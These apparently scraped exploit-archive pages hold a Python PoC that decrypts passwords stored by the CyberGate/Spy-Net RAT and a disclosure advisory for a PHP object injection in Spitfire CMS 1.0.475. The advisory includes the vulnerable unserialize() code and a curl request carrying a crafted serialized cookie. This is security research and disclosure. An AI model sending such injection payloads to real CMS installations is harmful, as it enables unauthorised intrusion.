/>#=========================================================================<br />#Basic password decryptor for the following RAT malwares:<br />#<br />#Trojan-Dropper.Win32.Decay.dxv (CyberGate v1.00.0)<br />#MD5: 618f28253d1268132a9f10819a6947f2<br />#<br />#Spy-Net 2.7 Beta 02 - Backdoor.Win32.Shpinat.a<br />#MD5: eaf37e9506ef76f6d26838692d76aabd<br />#<br />#By John Page (aka hyp3rlinx) Copyright (C) circa 2022<br />#malvuln.com<br />#malvuln13@gmail.com<br />#twitter.com/malvuln<br />#=========================================================================<br />#<br />#PoC to decrypt credentials due to flawed proprietary encryption.<br />#RAT password save usage:<br />#Click 'START' / Options then choose 'Select listening ports' from menu.<br />#Enter a new password in the 'Connection Password' field and click save.<br />#Password gets stored in 'Settings.ini' file.<br />#<br />#Note: Should recover most numeric and or lowercase passwords. May return<br />#multiple password candidates depending on the password recovered.<br />#Some limitation with long and or complex passwords, did not put much time on it!<br />#<br />#TODO: Better handle complex long mixed letters and or repeating characters.<br />#Author is NOT responsible for any misuse or incorrect password recovery,<br />#the user accepts ALL risk by using the software.<br />#<br />#MIT License - Copyright (c) 2022 malvuln<br />#Permission is hereby granted, free of charge, to any person obtaining a copy<br />#of this software and associated documentation files (the "Software"), to deal<br />#in the Software without restriction, including without limitation the rights<br />#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell<br />#copies of the Software, and to permit persons to whom the Software is<br />#furnished to do so, subject to the following conditions:<br /><br />#The above copyright notice and this permission notice shall be included in all<br />#copies or substantial portions of the Software.<br />#<br />#DISCLAIMER:<br />#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR<br />#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,<br />#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE<br />#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER<br />#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,<br />#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.<br /><br />#Permission is also explicitly given for insertion in vulnerability databases and similar,<br />#provided that due credit is given to the author:<br />#John Page (aka malvuln/hyp3rlinx) Copyright (C)(TM) 2022<br />#=========================================================================<br />BANNER="""<br /> ____ ______ __ <br /> / __ \___ _________ ___ __ / ____/________ ______/ /_____ _____ <br /> / / / / _ \/ ___/ __ `/ / / / / / / ___/ __ `/ ___/ //_/ _ \/ ___/ <br /> / /_/ / __/ /__/ /_/ / /_/ / / /___/ / / /_/ / /__/ ,< / __/ / <br /> /_____/\___/\___/\__,_/\__, / \____/_/ \__,_/\___/_/|_|\___/_/ <br /> /____/ v1 <br /> By Malvuln (c) circa 2022 <br />"""<br /><br />#Console colors<br />RED="\033[1;31;40m"<br />GREY="\033[1;30;40m"<br />GREEN="\033[1;32;40m"<br />CYAN="\033[1;36;40m"<br />YELLOW="\033[1;33;40m"<br />BOLD = "\033[1m"<br />ENDC = "\033[m" #Default<br /><br />key=["0","1","2","3","4","5","6","7","8","9","A","B","C","D","E","F","G","H","I",<br /> "J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z","a","b",<br /> "c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u",<br /> "v","w","x","y","z","+","/"]<br /><br />result=""<br />sz=0<br />key_error=False<br /><br />#Change console back to default if script exited unclean<br />def exit_handler():<br /> print(ENDC)<br /><br />def parse_args():<br /> parser = argparse.ArgumentParser()<br /> parser.add_argument("-c", "--creds", help="Password to decrypt, see --about")<br /> parser.add_argument("-a", "--about", nargs="?", const="1", help="About Decay password decryptor")<br /> parser.add_argument("-e", "--example", nargs="?", const="1", help="Password test samples")<br /> return parser.parse_args()<br /><br />def usage():<br /> print(RED+"[+] "+CYAN+"Encrypted password samples:"+GREY)<br /> print("[+]----------------------------")<br /> print("[-] GM9ZCJ8p8G : Abc123!")<br /> print("[-] KsLZScLqNp4 : Secret_1")<br /> print("[-] U7bwDZOsNpC : xyz666_3")<br /> print("[-] PsXlStG : ghost")<br /> print("[-] CZKmDZSuCp8q : 250678324")<br /> print("[-] P6bXOcnlC34oCm : diablo0123")<br /> print("[-] INTbON91JM5dRdLj : IwearAMagnum")<br /> print("[-] ON1mON9fT6blRdDbOm : apparitionsec")<br /><br /><br />def info():<br /> print(RED+"[$] "+GREY+"Credits: John Page (aka hyp3rlinx)")<br /> print("[!] Recovers most simple lowercase or numeric passwords for:")<br /> print("[-] Trojan-Dropper.Win32.Decay.dxv (CyberGate v1.00.0)"+GREY)<br /> print("[-] "+RED+"MD5: "+GREY+"618f28253d1268132a9f10819a6947f2")<br /> print("[-] Backdoor.Win32.Shpinat.a (Spy-Net 2.7 Beta 02)"+GREY)<br /> print("[-] "+RED+"MD5: "+GREY+"eaf37e9506ef76f6d26838692d76aabd")<br /><br /><br />def main(args):<br /> if args.creds:<br /> recover(args.creds)<br /> if args.about:<br /> info()<br /> if args.example:<br /> usage()<br /><br /><br />shf_map = {"0" : 6, "m" : 3, "p" : 3, "3" : 3, "M" : 6, "6" : 6, "C" : 3, "2" : 2,<br /> "D" : 3, "7" : 7, "s" : 6, "R" : 6, "J": 3, "Z": 3, "G" : 6, "o": 2,<br /> "W" : 6, "K" : 12, "c" : 6, "a" : 6, "4" : 6, "t" : 7, "q" : 12,<br /> "N" : 7, "7" : 7, "L" : 5, "r" : 6, "d" : 7, "I" : 2, "5" : 6, "Y" : 2}<br /><br /><br />def chunk(char):<br /> c=-1<br /> key_len=len(key) #64<br /> for i in key:<br /> c+=1<br /> if i==char:<br /> cnt = c<br /> #Grab part up to including the first char arg.<br /> tmp = key[c + 1:]<br /> return key_len - len(tmp)<br /><br />def doit(paswd):<br /> global key_error<br /> CREDZ=""<br /> lst = paswd.split(",")<br /> i=0<br /> EBX=0<br /> ECX=0<br /> TMP=0<br /> LSH=0<br /> <br /> for x in paswd:<br /> i+=1<br /> x = x.strip()<br /> EAX = chunk(x)<br /> EBX = EAX -1<br /> EBX_CPY = EAX -1<br /><br /> if i > 1:<br /><br /> #ADD<br /> TMP = int(hex(add(int(ECX), EBX_CPY)), 16)<br /><br /> #SHR<br /> if i== 2:<br /> TMP = TMP >> 4<br /> CREDZ = chr(TMP)<br /> <br /> if i == 3:<br /> TMP = TMP >> 2<br /> CREDZ += chr(TMP)<br /> if i == 4:<br /> CREDZ += chr(TMP)<br /><br /> #SHL<br /> if i==1:<br /> EBX = EBX << 6<br /> ECX = int(hex(EBX), 16)<br /><br /> if i==2:<br /> #Assign once<br /> if LSH ==0:<br /> try:<br /> LSH = int(shf_map[x])<br /> except KeyError as e:<br /> #Fail safe just in case<br /> print("[!] Key Error: Try adding a value for "+str(e)+" to the 'shf_map' dictionary.")<br /> key_error=True<br /> pass<br /> EBX = LSH << 6 <br /> ECX = int(hex(EBX), 16)<br /><br /> if i==3: #At end no SHL<br /> EBX = 1 << 6<br /> if LSH < 6:<br /> ECX = EBX - EBX <br /> else:<br /> ECX = int(hex(EBX), 16)<br /> <br /> time.sleep(0.1)<br /><br /> return CREDZ<br /><br />def recover(paswd):<br /> global result, sz<br /> tmp=""<br /> c=0<br /> sz=len(paswd)<br /> print("[+] "+CYAN+"Recovering: "+GREY+paswd)<br /> print("[-] Initial len: "+str(len(paswd)))<br /> for i in paswd:<br /> c+=1<br /> tmp += i<br /> #Handle single char passwds<br /> if sz == 2:<br /> result = doit(paswd)<br /> return<br /> #Process in chunks of four bytes<br /> if c == 4:<br /> paswd = paswd[c:]<br /> print("[+] cracking: " +tmp + " " +str(len(paswd)))<br /> result += doit(tmp)<br /> tmp=""<br /> c=0<br /> #Process leftover bytes<br /> if len(paswd) == 3:<br /> if c==3:<br /> print("[+] cracking: " +tmp + " " +str(len(paswd)))<br /> tmp += paswd[c:]<br /> result += doit(tmp)<br /> c=0<br /> elif len(paswd) == 2:<br /> tmp += paswd[c:c]<br /> result += doit(tmp)<br /> c=0<br /><br /><br />if __name__=="__main__":<br /> parser = argparse.ArgumentParser()<br /> if len(sys.argv)==1:<br /> parser.print_help(sys.stderr)<br /> sys.exit(1)<br /> os.system("color")<br /> print(RED+BANNER+GREY)<br /> print(RED+"[$] "+GREY+"CyberGate (Spy-Net) Trojan RAT") <br /> print(RED+"[$] "+GREY+"Basic Password Decryptor")<br /> atexit.register(exit_handler)<br /> main(parse_args())<br /> candidate2=""<br /> if result:<br /> if sz >= 8:<br /> if result[len(result)-1:] == "p":<br /> candidate2 = result[:len(result) -1] + "0"<br /> if result[len(result)-1:] == "q":<br /> candidate2 = result[:len(result) -1] + "1"<br /> if result[len(result)-1:] == "r":<br /> candidate2 = result[:len(result) -1] + "2"<br /> if result[len(result)-1:] == "s":<br /> candidate2 = result[:len(result) -1] + "3"<br /> if result[len(result)-1:] == "t":<br /> candidate2 = result[:len(result) -1] + "4"<br /> if result[len(result)-1:] == "u":<br /> candidate2 = result[:len(result) -1] + "5"<br /> if result[len(result)-1:] == "v":<br /> candidate2 = result[:len(result) -1] + "6"<br /> if result[len(result)-1:] == "w":<br /> candidate2 = result[:len(result) -1] + "7"<br /> if result[len(result)-1:] == "x":<br /> candidate2 = result[:len(result) -1] + "8"<br /> if result[len(result)-1:] == "y":<br /> candidate2 = result[:len(result) -1] + "9"<br /> if key_error:<br /> print("[*] Likely partially recovered credz: ==> "+result)<br /> else:<br /> if not candidate2:<br /> print("[*] Probable credz: ==> "+RED+result+GREY)<br /> else:<br /> print("[*] Probable credz: ==> "+RED+result+GREY+" OR "+RED+candidate2+GREY)<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code><br />Spitfire CMS 1.0.475 (cms_backup_values) PHP Object Injection<br /><br /><br />Vendor: Claus Muus<br />Product web page: http://spitfire.clausmuus.de<br />Affected version: 1.0.475<br /><br />Summary: Spitfire is a system to manage the content of webpages.<br /><br />Desc: The application is prone to a PHP Object Injection vulnerability<br />due to the unsafe use of unserialize() function. A potential attacker,<br />authenticated, could exploit this vulnerability by sending specially<br />crafted requests to the web application containing malicious serialized<br />input.<br /><br />-----------------------------------------------------------------------<br />cms/edit/tpl_backup.inc.php:<br />----------------------------<br />47: private function status ()<br />48: {<br />49: $status = array ();<br />50:<br />51: $status['values'] = array ();<br />52: $status['values'] = isset ($_COOKIE['cms_backup_values']) ? unserialize ($_COOKIE['cms_backup_values']) : array ();<br />...<br />...<br />77: public function save ($values)<br />78: {<br />79: $values = array_merge ($this->status['values'], $values);<br />80: setcookie ('cms_backup_values', serialize ($values), time()+60*60*24*30);<br />81: }<br />-----------------------------------------------------------------------<br /><br />Tested on: nginx<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5720<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5720.php<br /><br /><br />28.09.2022<br /><br />--<br /><br /><br />> curl -isk -XPOST http://10.0.0.2/cms/edit/tpl_backup_action.php \<br /> -H 'Content-Type: application/x-www-form-urlencoded'<br /> -H 'Accept: */*'<br /> -H 'Referer: http://10.0.0.2/cms/edit/cont_index.php?tpl=backup'<br /> -H 'Accept-Encoding: gzip, deflate'<br /> -H 'Accept-Language: en-US,en;q=0.9'<br /> -H 'Connection: close' \<br /> -H 'Cookie: tip=0; cms_backup_values=O%3a3%3a%22ZSL%22%3a0%3a%7b%7d; cms_username=admin; PHPSESSID=0e63d3a8762f4bff95050d1146db8c1c' \<br /> --data 'action=save&&value=1'<br /> #--data 'action=save&&value[files]={}'<br /></code></pre>